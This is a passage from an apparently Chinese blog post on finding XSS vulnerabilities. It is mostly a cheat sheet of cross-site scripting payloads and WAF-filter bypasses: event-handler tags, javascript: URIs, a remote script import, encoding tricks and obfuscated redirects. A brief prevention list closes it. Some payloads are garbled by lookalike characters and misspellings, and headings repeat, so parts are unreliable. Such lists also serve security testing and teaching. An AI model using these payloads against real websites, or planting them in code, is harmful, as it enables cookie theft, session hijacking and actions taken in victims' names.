作）、私密网页内容、会话和 cookie 等各种内容。

二、常用的 XSS 攻击手段和目的

1.盗用 cookie，获取敏感信息。

2.利用植入 Flash，通过 crossdomain 权限设置进一步获取更高权限；或者利用 Java 等得到类似的操作。

3.利用 iframe、frame、XMLHttpRequest 或上述 Flash 等方式，以（被攻击）用户的身份执行一些管理动作，或执行一些一般的操作如发微博、加好友、发私信等操作。

4.利用可被攻击的域受到其他域信任的特点，以受信任来源的身份请求一些平时不允许的操作，如进行不当的投票活动。

5.在访问量极大的一些页面上的 XSS 可以攻击一些小型网站，实现 DDOS 攻击的效果 。

三、分类

反射型

反射型跨站脚本（ Reflected Cross-Site Scripting ）是最常见，也是使用最广的一种，可将恶

意脚本附加到 URL 地址的参数中。反射型 XSS 的利用一般是攻击者通过特定手法（如电子邮件），诱使用户去访问一个包含恶意代码的 URL ，当受害者点击这些专门设计的链接的时候，恶意代码会直接在受害者主机上的浏览器执行。此类 XSS 通常出现在网站的搜索栏、用户登录口等地方，常用来窃取客户端 Cookies 或进行钓鱼欺骗。

存储型

持久型跨站脚本（ Persistent Cross-Site Scripting ）也等同于存储型跨站脚本（ Stored

Cross-Site Scripting ）。此类 XSS 不需要用户单击特定 URL 就能执行跨站脚本，攻击者事先将恶意代码上传或储存到漏洞服务器中，只要受害者浏览包含此恶意代码的页面就会执行恶意代码。持久型 XSS 一般出现在网站留言、评论、博客日志等交互处，恶意脚本存储到客户端或者服务端的数据库中。

DOM 型

传统的 XSS 漏洞一般出现在服务器端代码中，而 DOM-Based XSS 是基于 DOM 文档对象模型的一种漏洞，所以，受客户端浏览器的脚本代码所影响。客户端 JavaScript 可以访问浏览器的 DOM

文本对象模型，因此能够决定用于加载当前页面的 URL 。换句话说，客户端的脚本程序可以通过

DOM 动态地检查和修改页面内容，它不依赖于服务器端的数据，而从客户端获得 DOM 中的数据

（如从 URL 中提取数据）并在本地执行。另一方面，浏览器用户可以操纵 DOM 中的一些对象，例如 URL 、 location 等。用户在客户端输入的数据如果包含了恶意 JavaScript 脚本，而这些脚

本没有经过适当的过滤和消毒，那么应用程序就可能受到基于 DOM 的 XSS 攻击。

无任何过滤情况下一些常见标签

<scirpt>

<scirpt>alert("xss");</script>

<img>

<img src=1 οnerrοr=alert("xss");>

<input>

<input οnclick="alert('xss');">

点击事件

<input οnfοcus="alert('xss');">

竞争焦点，从而触发 onblur 事件

<input οnblur=alert("xss") autofocus><input autofocus>

通过 autofocus 属性执行本身的 focus 事件，这个向量是使焦点自动跳到输入元素上,触发焦点事

件，无需用户去触发

<input οnfοcus="alert('xss');" autofocus>

<details>

<details οntοggle="alert('xss');">

使用 open 属性触发 ontoggle 事件，无需用户去触发

<details open οntοggle="alert('xss');">

<svg>

<svg οnlοad=alert("xss");>

<select>

<select οnfοcus=alert(1)></select>

通过 autofocus 属性执行本身的 focus 事件，这个向量是使焦点自动跳到输入元素上,触发焦点事

件，无需用户去触发

<select οnfοcus=alert(1) autofocus>

<iframe>

<iframe οnlοad=alert("xss");></iframe>

<video>

<video><source οnerrοr="alert(1)">

<audio>

<audio src=x οnerrοr=alert("xss");>

<body>

<body/οnlοad=alert("xss");>

利用换行符以及 autofocus，自动去触发 onscroll 事件，无需用户去触发

<body

οnscrοll=alert("xss");><br><br><br><br><br><br><br><br><br><br><br><br><br><br>

<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br

><br><br><br><br><br><br><input autofocus>

<textarea>

<textarea οnfοcus=alert("xss"); autofocus>

<keygen>

<keygen autofocus οnfοcus=alert(1)> // 仅限火狐

<marquee>

<marquee onstart=alert("xss")></marquee> //Chrome 不行，火狐和 IE 都可以

<isindex>

<isindex type=image src=1 οnerrοr=alert("xss")>// 仅限于 IE

利用 link 远程包含 js 文件——在无 CSP 的情况下才可以

<link rel=import href="http://127.0.0.1/1.js">

javascript 伪协议

<a> 标签

<a href="javascript:alert(`xss`);">xss</a>

<iframe> 标签

<iframe src=javascript:alert('xss');></iframe>

<img> 标签

<img src=javascript:alert('xss')>//IE7 以下

<form> 标签 <form action="Javascript:alert(1)"><input type=submit>

其它

expression 属性

<img style="xss:expression(alert('xss''))"> // IE7 以下

<div style="color:rgb('' x:expression(alert(1))"></div> //IE7 以下

<style>#test{x:expression(alert(/XSS/))}</style> // IE7 以下

background 属性

<table background=javascript:alert(1)></table> // 在 Opera 10.5 和 IE6 上有效

有过滤的情况下

过滤空格——用 / 代替空格

< img / src = "x" / onerror = alert ( "xss" ); >

过滤关键字

大小写绕过

< ImG sRc = x onerRor = alert ( "xss" ); >

双写关键字

有些 waf 可能会只替换一次且是替换为空，这种情况下我们可以考虑双写关键字

绕过

< imimgg srsrcc = x onerror = alert ( "xss" ); >

字符拼接

利用 eval

< img src = "x" onerror = "a=`aler`;b=`t`;c='(`xss`);';eval(a+b+c)" > 利用 top

<script>top["al"+"ert"](`xss`);</script>

其它字符混淆

有的 waf 可能是用正则表达式去检测是否有 xss 攻击，如果我们能 fuzz 出正则的

规则，则我们就可以使用其它字符去混淆我们注入的代码了

下面举几个简单的例子

可利用注释、标签的优先级等

1.<<script>alert("xss");//<</script>

2.<title><img src=</title>><img src=x οnerrοr="alert(`xss`);"> //因为 title 标签

的优先级比 img 的高，所以会先闭合 title，从而导致前面的 img 标签无效

3.<SCRIPT>var a="\\";alert("xss");//";</SCRIPT>

编码绕过

Unicode 编码绕过

< img src = "x"

onerror = "alert("xss")

9;" >

< img src = "x"

onerror = "eval('\u0061\u006c\u0065\u0072\u0074\u0028\u0022\u0078\u0073\u0073\u00

22\u0029\u003b')" >

url 编码绕过

< img src = "x"

onerror = "eval(unescape('%61%6c%65%72%74%28%22%78%73%73%22%29%3b'))" >

<iframe

src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%6

3%72%69%70%74%3E"></iframe>

Ascii 码绕过

< img src = "x"

onerror = "eval(String.fromCharCode(97,108,101,114,116,40,34,120,115,115,34,41,59

))" >

hex 绕过

<img src=x οnerrοr=eval('\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29')>

八进制

<img src=x οnerrοr=alert('\170\163\163')>

base64 绕过

<img src="x"

οnerrοr="eval(atob('ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly93d3cuYmFpZHUuY29tJw=='))

">

<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=">

过滤双引号，单引号

1. 如果是 html 标签中，我们可以不用引号。如果是在 js 中，我们可以用反引号代

替单双引号

<img src="x" οnerrοr=alert(`xss`);>

2. 使用编码绕过，具体看上面我列举的例子，我就不多赘述了

过滤括号

当括号被过滤的时候可以使用 throw 来绕过

<svg/οnlοad="window.οnerrοr=eval;throw'=alert\x281\x29';">

过滤 url 地址——使用 url 编码

<img src="x"

οnerrοr=document.location=`http://%77%77%77%2e%62%61%69%64%75%2e%63%6f%6d/`>

使用 IP

1. 十进制 IP

<img src="x" οnerrοr=document.location=`http://2130706433/`>

2. 八进制 IP

<img src="x" οnerrοr=document.location=`http://0177.0.0.01/`>

3.hex <img src="x" οnerrοr=document.location=`http://0x7f.0x0.0x0.0x1/`>

4.html 标签中用 // 可以代替 http://

<img src="x" οnerrοr=document.location=`//www.baidu.com`>

5. 使用中文逗号代替英文逗号

如果你在你在域名中输入中文句号浏览器会自动转化成英文的逗号

<img src="x" οnerrοr="document.location=`http://www 。 baidu 。 com`">// 会自动跳转到百度

[Java知识库]xss漏洞挖掘经验分享

一、简述

二、常用的 XSS 攻击手段和目的

三、分类

反射型

存储型

DOM 型

三、如何防止 xss

（一）过滤一些危险字符，以及转义& < > " ' /等危险字符。

（二）HTTP-only Cookie: 禁止 JavaScript 读取某些敏感 Cookie，攻击者完成 XSS 注入后也无法窃取此 Cookie。

（三）设置 CSP(Content Security Policy)

（四）输入内容长度限制

[Java知识库]xss漏洞挖掘经验分享

一、简述

二、常用的 XSS 攻击手段和目的

三、分类

反射型

存储型

DOM 型

三、如何防止 xss

（一）过滤一些危险字符，以及转义& < > " ' /等危险字符 。

（二）HTTP-only Cookie: 禁止 JavaScript 读取某些敏感 Cookie，攻击者完成 XSS 注入后也无法窃取此 Cookie。

（三）设置 CSP(Content Security Policy)

（四）输入内容长度限制

（一）过滤一些危险字符，以及转义& < > " ' /等危险字符。